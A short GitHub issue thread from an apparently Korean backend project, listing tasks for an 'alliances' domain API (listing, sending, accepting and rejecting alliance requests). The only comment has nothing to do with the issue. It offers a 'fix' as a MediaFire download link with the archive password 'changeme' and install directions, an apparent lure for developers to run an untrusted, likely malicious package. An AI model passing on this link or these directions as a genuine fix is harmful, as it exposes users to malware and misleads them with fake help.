### ISSUE TITLE
alliances 도메인 API 개발

### ISSUE THREAD

**Issue by kmj-99** [StockmonGo/BE#29]
## ✅ 해야 할 작업을 TASK 별로 작성해주세요.
- [x] 동맹 목록 조회
- [ ] 동맹 추가 요청
- [ ] 동맹 요청 수락
- [ ] 동맹 요청 거절

<br><br>

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
